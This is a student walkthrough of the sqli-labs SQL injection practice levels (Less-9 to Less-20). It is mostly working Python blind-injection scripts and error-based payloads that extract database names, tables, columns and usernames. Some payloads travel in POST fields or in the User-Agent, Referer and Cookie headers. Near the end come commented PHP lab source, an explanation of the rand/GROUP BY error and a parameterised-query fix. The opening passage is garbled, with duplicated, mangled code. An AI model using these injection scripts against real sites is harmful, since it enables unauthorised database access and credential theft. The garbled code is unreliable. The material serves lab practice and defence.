50 for num in range(1, table_length + 1): 51 for asc in range(32, 128): 52 s_time = () 53 ((num=num, asc=asc)) 54 e_time = () 55 if (e_time - s_time) > 3: 56 table_name += chr(asc) 57 print("所有的数据表名:", table_name) 58 break 59 def column_length(table_name,databa_name): 60 global url 61 for i in range(1, 10000): 62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))> 63 s_time = () 64 (url=sql, timeout=3) 65 e_time = () 66 # print(sql) 67 if (e_time - s_time) > 3: 68 print(table_name, "中的所有字段名长:", i) 69 break 70 def column_name(column_length,table_name,databa_name): 71 global url 72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where 
table_name='" + table_name + "' and table_schema='"+databa_name+ 73 table_name = '' 74 for num in range(1, column_length + 1): 75 for asc in range(32, 128): 76 s_time = () 77 ((num=num, asc=asc)) 78 e_time = () 79 if (e_time - s_time) > 3: 80 table_name += chr(asc) 81 print("所有的数据表名:", table_name) 82 break 83 def data_length(column_name,table_name): 84 global url 85 for i in range(1, 10000): 86 sql = url + " and if((lect length((lect group_concat("+column_name+" parator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+" 87 s_time = () 88 (url=sql, timeout=3) 89 e_time = () 90 # print(sql) 91 if (e_time - s_time) > 3: 92 print(column_name, "字段的值长:", i) 93 break 94 def data_detail(data_length,column_name,table_name): 95 global url 96 sql = url + " and if(ascii(substr((lect group_concat("+column_name+" parator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+" 97 data = '' 98 for num in range(1, data_length + 1): 99 for asc in range(32, 128): 100 s_time = () 101 ((num=num, asc=asc)) 102 e_time = () 103 if (e_time - s_time) > 3: 104 data += chr(asc) 105 print(column_name,"字段的值:", data) 106 break 107 if __name__ == '__main__': 108 # databa_length() # 8 109 # databa_name(8) #curity 110 # table_length('curity')#curity 中的所有数据表名长: 29 111 # table_name(29, 'curity')#所有的数据表名: emails@referers@uagents@urs 112 # column_length('urs','curity') #20 113 # column_name(20,'urs','curity')#所有的数据表名: id@urname@password 114 # data_length('urname', 'urs')#91 115 data_detail(91, 'urname', 'urs')#urname 字段的值: Dumb@Angelina@Dummy@cure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4 脚本 Less-10:时间盲注+双引号闭合 双引号+时间盲注 id=1" and sleep(3)--+ 1 ''' 2 @Modify Time @Author 3 ------------ ------- 4 2019/10/2 16:56 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9 10 url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"' 11 def databa_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((lect 
length(databa()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 respon = (url=sql,timeout=3) 17 e_time = () 18 print(sql) 19 if(e_time-s_time) > 3: 20 print("数据库长:",i) 21 break 22 def databa_name(databa_length): 23 global url 24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+" 25 db_name = '' 26 for num in range(1, databa_length+1): 27 for asc in range(ord('a'), ord('z') + 1): 28 s_time = () 29 ((num=num, asc=asc)) 30 e_time = () 31 if (e_time - s_time) > 3: 32 db_name += chr(asc) 33 print("数据库名:",db_name) 34 break 35 def table_length(databa_name): 36 global url 37 for i in range(1, 10000): 38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+" 39 s_time = () 40 respon = (url=sql, timeout=3) 41 e_time = () 42 print(sql) 43 if (e_time - s_time) > 3: 44 print(databa_name,"中的所有数据表名长:", i) 45 break 46 def table_name(table_length,databa_name): 47 global url 48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+" 49 table_name = '' 50 for num in range(1, table_length + 1): 51 for asc in range(32, 128): 52 s_time = () 53 ((num=num, asc=asc)) 54 e_time = () 55 if (e_time - s_time) > 3: 56 table_name += chr(asc) 57 print("所有的数据表名:", table_name) 58 break 59 def column_length(table_name,databa_name): 60 global url 61 for i in range(1, 10000): 62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))> 63 s_time = () 64 (url=sql, timeout=3) 65 e_time = () 66 # print(sql) 67 if (e_time - s_time) > 3: 68 print(table_name, "中的所有字段名长:", i) 69 break 70 def column_name(column_length,table_name,databa_name): 71 global url 72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where 
```python
table_name='" + table_name + "' and table_schema='"+database_name+
    table_name = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                table_name += chr(asc)
                print("所有的数据表名:", table_name)
                break


def data_length(column_name, table_name):
    global url
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(" + column_name + " separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql, timeout=3)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(column_name, "字段的值长:", i)
            break


def data_detail(data_length, column_name, table_name):
    global url
    sql = url + " and if(ascii(substr((select group_concat(" + column_name + " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                data += chr(asc)
                print(column_name, "字段的值:", data)
                break


if __name__ == '__main__':
    # database_length()  # 8
    # database_name(8)  # security
    # table_length('security')  # total length of the table names in security: 29
    # table_name(29, 'security')  # all table names: emails@referers@uagents@users
    # column_length('users', 'security')  # 20
    # column_name(20, 'users', 'security')  # all column names: id@username@password
    # data_length('username', 'users')  # 91
    data_detail(91, 'username', 'users')  # username values: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4
```

Less-10: the same as Less-9; only the url is changed.

POST section

Less-11: POST injection
Finally on to the POST-type levels. When I first opened this page I was completely lost. After browsing some walkthroughs, and with a hint from a senior's blog, I realised the routine is exactly the same as Less-1, just in a slightly different shape and perhaps a bit less direct. Orz

Less-12: double quote + parenthesis closure
Zoomed Burp in a little, hehe.

Less-13: error-based injection
Background: these constructions were provided by a senior online, but he did not explain them in detail [I really am too much of a newbie; I couldn't even understand the answer. Orz]

```
Error: Duplicate entry '::security::0' for key 1
') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.tables group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

Error: Duplicate entry '::5.0.51a-3ubuntu5::0' for key 1
') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1&submit=Submit

Error: Duplicate entry '5.0.51a-3ubuntu5::security::root@localhost:1' for key 1
') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit

Error: Duplicate entry '13::1' for key 1
') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

Error: Duplicate entry 'Dumb::Dumb::1' for key 1
') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
```

Take the first one:

```
') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit
```

It is equivalent to:

```
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.tables group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
```

Error type: "duplicate primary key".
- Whenever count, rand(0) and group by are used together this error occurs, regardless of their position.
- According to MySQL, when a group by statement is executed the expression after group by is evaluated twice.
- rand(0) produces a more stable (repeatable) sequence.
- concat() merely joins ":", the database name and the result of floor(rand(0)*2) so that the output is easy to read (0x3a = ':').

0x03 Duplicate primary key

This relies on count() and group by raising an error when they meet duplicate values produced by rand(). The payload commonly seen online looks like this:

```
mysql> select count(*) from test group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'
```

The error type is duplicate entry, i.e. a duplicate primary key. In fact, whenever count, rand() and group by are used together this error occurs, regardless of position:

```
mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'
```

The essence of this error-based technique is that the repetition in floor(rand(0)*2) makes the group by statement fail. group by key works by reading each row of the data in a loop and saving the result in a temporary table. When a row's key is read, if the key already exists in the temporary table no new row is inserted; if it does not, the row's data is inserted under that key. For example, with the following table:

```
mysql> select * from test;
+------+-------+
| id   | name  |
+------+-------+
|    0 | jack  |
|    1 | jack  |
|    2 | tom   |
|    3 | candy |
|    4 | tommy |
|    5 | jerry |
+------+-------+
6 rows in set (0.00 sec)
```

Taking select count(*) from test group by name as the example, the process is roughly as follows. First a virtual table is created, with key as the primary key (no duplicates allowed):

```
key   | count(*)
------+---------
```

Then the rows are scanned: each row is fetched from the table and the virtual table is checked. If the key is absent a new record is inserted; if it is present the count(*) field is simply incremented:

```
key   | count(*)
------+---------
jack  | 1

key   | count(*)
------+---------
jack  | 1+1

key   | count(*)
------+---------
jack  | 1+1
tom   | 1

key   | count(*)
------+---------
jack  | 1+1
tom   | 1
candy | 1
```

When this operation meets rand(0)*2 an error occurs. The reason is that rand(0) is a stable sequence; evaluating rand(0) twice gives:

```
mysql> select rand(0) from test;
+---------------------+
| rand(0)             |
+---------------------+
| 0.15522             |
| 0.628               |
| 0.6387474552157777  |
| 0.33147             |
| 0.739218            |
| 0.7334              |
+---------------------+
6 rows in set (0.00 sec)

mysql> select rand(0) from test;
+---------------------+
| rand(0)             |
+---------------------+
| 0.15522             |
| 0.628               |
| 0.6387474552157777  |
| 0.33147             |
| 0.739218            |
| 0.7334              |
+---------------------+
6 rows in set (0.00 sec)
```

Likewise, floor(rand(0)*2) always yields the same fixed sequence (this is important):

```
mysql> select floor(rand(0)*2) from test;
+------------------+
| floor(rand(0)*2) |
+------------------+
|                0 |
|                1 |
|                1 |
|                0 |
|                1 |
|                1 |
+------------------+
6 rows in set (0.00 sec)
```

Back to the group by statement. Change it to select count(*) from test group by floor(rand(0)*2) and walk through each step. First an empty table is created:

```
key   | count(*)
------+---------
```

Fetch the first record and evaluate floor(rand(0)*2): the result is 0 (1st evaluation). The virtual table is checked and this key is not found, so floor(rand(0)*2) is evaluated again and the result 1 (2nd evaluation) is inserted into the virtual table:

```
key   | count(*)
------+---------
1     | 1
```

Fetch the second record and evaluate floor(rand(0)*2) again: the result is 1 (3rd evaluation). The virtual table is checked, key 1 exists, so there is no second evaluation and count(*) is simply incremented:

```
key   | count(*)
------+---------
1     | 1+1
```

Fetch the third record and evaluate floor(rand(0)*2) again: the result is 0 (4th evaluation). Key 0 is not found, so an insert is attempted; floor(rand(0)*2) is evaluated once more and the result 1 (5th evaluation) is used as the primary key of the virtual table. But key 1 already exists in the virtual table, so the insert raises the duplicate primary key error.

The final error, i.e. duplicate primary key '1':

```
mysql> select count(*) from test group by floor(rand(0)*2);
ERROR 1062 (23000): Duplicate entry '1' for key '<group_key>'
```

During the whole query floor(rand(0)*2) is evaluated 5 times and the source table is read 3 times, so the table needs at least 3 rows for the error to occur (in other words floor must run at least 5 times). The official documentation has a note about rand():

> RAND() in a WHERE clause is evaluated for every row (when selecting from one table) or combination of rows (when selecting from a multiple-table join). Thus, for optimizer purposes, RAND()

If a sequence starts with 0,1,0 or 1,0,1 there will never be an error, because the first two keys of the virtual table will be 0 and 1 respectively, and every later row just increments count(*):

```
mysql> select floor(rand(1)*2) from test;
+------------------+
| floor(rand(1)*2) |
+------------------+
|                0 |
|                1 |
|                0 |
|                0 |
|                0 |
|                1 |
+------------------+
6 rows in set (0.00 sec)

mysql> select count(*) from test group by floor(rand(1)*2);
+----------+
| count(*) |
+----------+
|        3 |
|        3 |
+----------+
2 rows in set (0.00 sec)
```

Enumerating tables:

```
uname=') union select count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a# &passwd=1# &submit=Submit
```

But I still could not retrieve more detailed data. It turned out to be a problem with group_concat(); after switching to limit 0,1 it worked, though I don't know why group_concat failed. Since I didn't know how many tables the security database actually has, after sending the requests I could tell from the response lengths that there are 4 tables.

Enumerating column names:

```
uname=') union select count(*),concat(0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a# &passwd=1# &submit=Submit
```

Sending requests the same way shows that the emails table has only two columns.

Retrieving the values of email_id:

```
uname=') union select count(*),concat(0x3a,(select email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit
```

Postscript: while researching I came across a very powerful function, name_const().
name_const(): local variables in MySQL stored procedures are converted by an internal function name_const; it seems to be designed specifically for stored procedures, and nothing else special is mentioned about it.
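The walkthrough above describes the GROUP BY temporary table being filled with the key expression evaluated once for the lookup and a second time for the insert. The following added illustration (not code from the original post) models exactly that procedure, replaying the floor(rand(0)*2) and floor(rand(1)*2) sequences the post lists over a constructed 6-row `test` table, so you can check the "5 evaluations, 3 rows" claim and see why a sequence starting 0,1,0 never collides:

```python
"""Model of the GROUP BY temporary table described above: the key expression is
evaluated once to look the key up and, when the key is absent, a second time to
produce the value that is actually inserted.  Added illustration, not code from the
original post.  The two floor(rand(seed)*2) sequences are the ones the walkthrough
lists; the 6-row test table is constructed here."""


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (Duplicate entry ... for key '<group_key>')."""


class Replay:
    """Replays a fixed sequence, the way rand(seed) yields the same values every query."""

    def __init__(self, seq):
        self._it = iter(seq)
        self.evaluations = 0

    def __call__(self, row):
        self.evaluations += 1
        return next(self._it)


def group_by_count(rows, key_of):
    """Build {key: count} the way the walkthrough describes the server doing it."""
    temp = {}
    for row in rows:
        k = key_of(row)                  # evaluation used for the lookup
        if k in temp:
            temp[k] += 1                 # key present: no second evaluation
            continue
        k2 = key_of(row)                 # key absent: evaluated again for the insert
        if k2 in temp:                   # the two evaluations disagreed -> collision
            raise DuplicateEntry(f"Duplicate entry '{k2}' for key '<group_key>'")
        temp[k2] = 1
    return temp


RAND0_FLOOR = [0, 1, 1, 0, 1, 1]   # floor(rand(0)*2) over 6 rows, as listed on the page
RAND1_FLOOR = [0, 1, 0, 0, 0, 1]   # floor(rand(1)*2) over 6 rows, as listed on the page
TEST_ROWS = ["jack", "jack", "tom", "candy", "tommy", "jerry"]   # constructed `test` table


def run(seq, rows=TEST_ROWS):
    """Return (result dict or error text, number of key evaluations performed)."""
    key = Replay(seq)
    try:
        return group_by_count(rows, key), key.evaluations
    except DuplicateEntry as e:
        return str(e), key.evaluations
    except StopIteration:
        # the page only lists six values; stop rather than invent more
        return "sequence exhausted", key.evaluations


def min_rows_to_error(seq):
    """Smallest row count at which the query fails, or None if the listed values never collide."""
    for n in range(1, len(seq) + 1):
        outcome, _ = run(seq, TEST_ROWS[:n])
        if outcome == "sequence exhausted":
            return None
        if isinstance(outcome, str):
            return n
    return None


if __name__ == "__main__":
    print(run(RAND0_FLOOR))                 # fails on the 3rd row after 5 evaluations
    print(run(RAND1_FLOOR, TEST_ROWS[:4]))  # keys 0 and 1 both present, no error
    print(group_by_count(TEST_ROWS, lambda row: row))   # deterministic key: plain counts
```

With a deterministic key (the `group by name` case) both evaluations agree and the model reduces to ordinary counting; with rand(0) the fourth and fifth evaluations disagree on the third row, which is the collision the post traces by hand. For rand(1) the model is run on four rows only, because the two keys 0 and 1 consume six evaluations by then and the post does not list further values.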
Usage: union select 1,2,3 from (select name_const((your query),1),name_const((your query),1))x #

Table names:

```
=1') union select 1,3 from (select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))x#

=1') union select 1,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1))x#
```

3. The rest follows the same pattern.

Less-14: double quote bypass + error-based injection (same as 13)

Method 1:

```
uname=1" union select 1,3 from (select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))x#&passwd=12&submit=Submit
```

Method 2:

```
uname=" union select count(*),concat(0x3a,(select email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit
```

Less-15: time-based blind injection + single quote
I finally managed to write it, with some difficulty, Orz. The table_name() function was adapted from a senior's script, but I found it ran very slowly, so I wrote the rest with if; I couldn't be bothered to change it, so take it as reference only.

```python
'''
@Modify Time      @Author
------------      -------
2019/10/5 18:21   laoalo
'''
import time        # imports assumed: the excerpt skips lines 6-11
import requests

url = "http://192.168.199.190/sqli-labs-master/Less-15/"


def database_length():
    global url
    for i in range(1, 10000):
        s_time = time.time()
        data = {
            'uname': "admin' and if ( length(database()) < %d , sleep(3) , 1)#" % (i),
            'passwd': 'admin',
            # 'submit': 'Submit'
        }
        print(data['uname'])
        requests.post(url=url, data=data)
        e_time = time.time()
        if (e_time - s_time) > 2:
            print("\t\t\t\t数据库长:", i - 1)
            break


def database_name(length):
    global url
    name = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            s_time = time.time()
            data = {
                'uname': "admin' and if (ascii (substr(database(), %d, 1))=%d, sleep(3), 1)#" % (j, i),
                'passwd': 'admin',
                # 'submit': 'Submit'
            }
            re = requests.post(url=url, data=data)
            e_time = time.time()
            print(data['uname'])
            # print("\t\t\t\t数据库名:", chr(i))
            if (e_time - s_time) > 2:
                name += chr(i)
                print("\t\t\t\t数据库名:", name)
                break


def table_length():
    global url
    for i in range(1, 10000):
        s_time = time.time()
        data = {
            'uname': "admin' and if ( length((select group_concat(table_name) from information_schema.tables where table_schema=database())) < %d , sleep(3) , 1)#" % (i),
            'passwd': 'admin',
            # 'submit': 'Submit'
        }
        print(data['uname'])
        requests.post(url=url, data=data)
        e_time = time.time()
        if (e_time - s_time) > 2:
            print("\t\t\t\t所有的数据表长:", i - 1)
            break


def table_name(table_length):
    global url
    chars = "abcdefghijklmnopqrstuvwxyz_"
    print("start!")
    tablename = ""
    for i in range(0, table_length + 1):
        print("\n第 %d 张表的爆破" % (i + 1))
        for j in range(0, 20):
            for ch in chars:
                # print(ch)
                time1 = time.time()
                data = {
                    'uname': "admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))='%s',1,sleep(2))#" % (i, j, ch),
                    'passwd': "1"}
                res = requests.post(url, data=data)
                print(data['uname'])
                time2 = time.time()
                c = time2 - time1
                if c < 1:
                    tablename += ch
                    print("表名:", tablename)
                    break

    print("\t\t\t\t表名:", tablename)


def columns_length(table_name):
    global url
    for i in range(1, 10000):
        s_time = time.time()
        data = {
            'uname': "admin' and if ( length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema=database())) < %d , sleep(3) , 1)#" % (i),
            'passwd': 'admin',
            # 'submit': 'Submit'
        }
        print(data['uname'])
        requests.post(url=url, data=data)
        e_time = time.time()
        if (e_time - s_time) > 2:
            print("\t\t\t\t字段长:", i - 1)
            break


def column_name(length, table_name):
    global url
    column_name = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            s_time = time.time()
            data = {
                'uname': "admin' and if (ascii (substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema=database()), %d, 1))=%d, sleep(3), 1)#" % (j, i),
                'passwd': 'admin',
                # 'submit': 'Submit'
            }
            re = requests.post(url=url, data=data)
            e_time = time.time()
            print(data['uname'])
            # print("\t\t\t\t数据库名:", chr(i))
            if (e_time - s_time) > 2:
                column_name += chr(i)
                print("\t\t\t\t字段名:", column_name)
                break


def data_length(colums, table):
    global url
    for i in range(1, 10000):
        s_time = time.time()
        data = {
            'uname': "admin' and if ( length((select group_concat(" + colums + ") from " + table + ")) < %d , sleep(3) , 1)#" % (i),
            'passwd': 'admin',
            # 'submit': 'Submit'
        }
        print(data['uname'])
        requests.post(url=url, data=data)
        e_time = time.time()
        if (e_time - s_time) > 2:
            print("\t\t\t\t所有的数据长:", i - 1)
            break


def data_detail(length, colums, table):
    global url
    column_name = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            s_time = time.time()
            data = {
                'uname': "admin' and if (ascii (substr((select group_concat(" + colums + ") from " + table + "), %d, 1))=%d, sleep(3), 1)#" % (j, i),
                'passwd': 'admin',
                # 'submit': 'Submit'
            }
            re = requests.post(url=url, data=data)
            e_time = time.time()
            print(data['uname'])
            # print("\t\t\t\t数据库名:", chr(i))
            if (e_time - s_time) > 2:
                column_name += chr(i)
                print("\t\t\t\t字段名:", column_name)
                break


if __name__ == '__main__':
    # database_length()
    # database_name(8)
    # table_length()
    # table_name(10)
    # columns_length('emails')
    # column_name(11,'emails')
    # data_length('email_id','emails')
    data_detail(157, 'email_id', 'emails')
```

(brute-force script)

Of course you can also send requests one by one in Burp, for example to find the database length:

```
uname=admin' and if (length(database())>1,0,sleep(3))+--+&passwd=admin&submit=Submit
```

From the delay the length is determined to be 8.

As for sqlmap, forget it; this is manual practice after all.

Less-16: double quote + parentheses + time-based blind injection
Same as 15; tweak the script and it works.

Less-17: an apparent double injection
Here is the source; you can see that uname is filtered:

```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/");
error_reporting(0);

function check_input($value)
{
    /**
     * First condition: truncate to 15 characters
     */
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    /* get_magic_quotes_gpc():
       get_magic_quotes_gpc() returns the value of the PHP configuration variable magic_quotes_gpc (GPC: Get/Post/Cookie).
       It returns 0 when the feature is off and 1 when it is on.

       When magic_quotes_gpc is on,
       every ' (single quote), " (double quote), \ (backslash) and NULL character
       is automatically escaped with a backslash.
    */

    /* stripslashes():

       stripslashes(string) removes the backslashes added by addslashes().

       addslashes(string) returns a string with backslashes added before predefined characters:
         single quote '
         double quote "
         backslash \
         NUL
       It can be used to prepare strings for storage in a database and for database queries.

       Note: by default PHP automatically runs addslashes() on all GET, POST and COOKIE data.
       So addslashes() should not be applied to already escaped strings, as that would double-escape them.
       Use get_magic_quotes_gpc() to detect this situation.

    */
    /**
     * Second condition: remove existing escape characters
     */
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number

    /*
       ctype_digit(string)
       checks whether every character in the string is a decimal digit; returns TRUE if so, otherwise FALSE.
    */
    /**
     * Third condition: escape string input
     */
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
        /*
           mysql_real_escape_string()
           mysql_real_escape_string(string,connection)

           Parameter: description
           string: required, the string to escape
           connection: optional, the MySQL connection; if omitted, the last opened connection is used
           mysql_real_escape_string() escapes the special characters in a string used in an SQL statement: \x00, \n, \r, \, ', ", \x1a
           On success it returns the escaped string; on failure it returns FALSE.
           (lines 71-77 not shown in the excerpt)
        */
    }
    else
    {
        /**
         * Fourth condition: if the input is numeric, turn it into a number. PS: so hex injection can't be used here, I suppose
         *
         */
        $value = intval($value);
        /*

           intval(var[,base])
           Parameter: description
           var: the value to convert to an integer
           base: the base used for the conversion
           intval() returns the integer value of var, converted using the given base (default decimal).
           intval() must not be used on objects; doing so raises an E_NOTICE and returns 1.

           On success returns the integer value of var; on failure returns 0.
           An empty array returns 0, a non-empty array returns 1; the maximum value depends on the operating system.

           If base is 0, the base is chosen from the format of var:

           if the string has a 0x or 0X prefix, base 16 (hex) is used; otherwise,
           if the string starts with 0, base 8 (octal) is used; otherwise,
           base 10 (decimal) is used.
        */
    }
    return $value;
}


// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);

    $passwd=$_POST['passwd'];


    //logging the connection parameters to a file for analysis.
    $fp=fopen('','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);


    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "";   // HTML markup of lines 136-139 not shown in the excerpt



        if (mysql_error())
        {
            echo '';
            print_r(mysql_error());
            echo "";
```

Trying basic injection:

Finally trying error-based injection: [name_const() is really handy]

```
uname=admin&passwd=' or (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b) where username='admin'--+#&submit=Submit

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)) a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1)) a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a)--+
```

Detailed analysis:

Less-18: HTTP header injection via User-Agent

```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/");
error_reporting(0);

// (lines 6-77 not shown in the excerpt)
else
{
    echo '';
    //echo "Try again looser";
    print_r(mysql_error());
    echo "";
    echo "";
    echo '';
    echo "";
}

}
```

The rest is the usual routine.

```
' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) and '1'='1
```

Less-19: HTTP header injection via Referer
Practically identical to 18.

```
Referer: ' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) and '1'='1
```

Less-20: HTTP header injection via Cookie + code audit + error-based injection
See 17 for details.

```
cookie: uname=' or (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)#
```

Notes:
- do not use ' --+ ' as the comment;
- do not add the submit parameter.
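The Less-17 source above runs `check_input` on `uname` only; `passwd` is dropped verbatim into the UPDATE, and the second query also trusts `$row1` read back from the table. The following added example (not the lab's code) rebuilds that logic against an in-memory SQLite table, once by string formatting like the PHP and once with bound parameters, so the difference shows on an ordinary password that merely contains an apostrophe. The users table and its rows are constructed here.

```python
"""Less-17's password update, rebuilt twice: string-formatted like the PHP, and
parameterised.  Added example, not the lab's code; SQLite stands in for MySQL and
the users rows are constructed sample data."""
import sqlite3


def make_db():
    """Constructed stand-in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "admin"), ("dumb", "dumb")])
    conn.commit()
    return conn


def lookup_user(conn, uname):
    """The SELECT step.  The username is bound, which is what check_input's quoting
    and mysql_real_escape_string achieve for uname in the PHP."""
    row = conn.execute("SELECT username FROM users WHERE username = ? LIMIT 1", (uname,)).fetchone()
    return row[0] if row else None


def stored_password(conn, uname):
    return conn.execute("SELECT password FROM users WHERE username = ?", (uname,)).fetchone()[0]


def update_password_unsafe(conn, uname, passwd):
    """Equivalent of  $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    passwd is spliced into the statement text.  Returns the password now stored,
    None if no such user, or the database error text when the text is malformed."""
    row1 = lookup_user(conn, uname)
    if row1 is None:
        return None
    stmt = f"UPDATE users SET password = '{passwd}' WHERE username='{row1}'"
    try:
        conn.execute(stmt)
        conn.commit()
    except sqlite3.OperationalError as e:      # a quote in passwd ends the literal early
        return f"error: {e}"
    return stored_password(conn, row1)


def update_password_safe(conn, uname, passwd):
    """Hardened form: every user-controlled value, including the username read back
    from the table, is bound as a parameter, so quotes in it are data, never syntax."""
    row1 = lookup_user(conn, uname)
    if row1 is None:
        return None
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (passwd, row1))
    conn.commit()
    return stored_password(conn, row1)


if __name__ == "__main__":
    db = make_db()
    print(update_password_unsafe(db, "admin", "O'Brien"))   # error: the apostrophe breaks the statement
    print(update_password_safe(db, "admin", "O'Brien"))     # O'Brien, stored verbatim
```

The point the PHP illustrates is that escaping one field proves nothing about the others: the password the user supplies never passes through `check_input`, and in the original the resulting MySQL error is even printed back by `print_r(mysql_error())`. Binding both values, as `update_password_safe` does, removes the string-building step that the error-based payloads above depend on.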
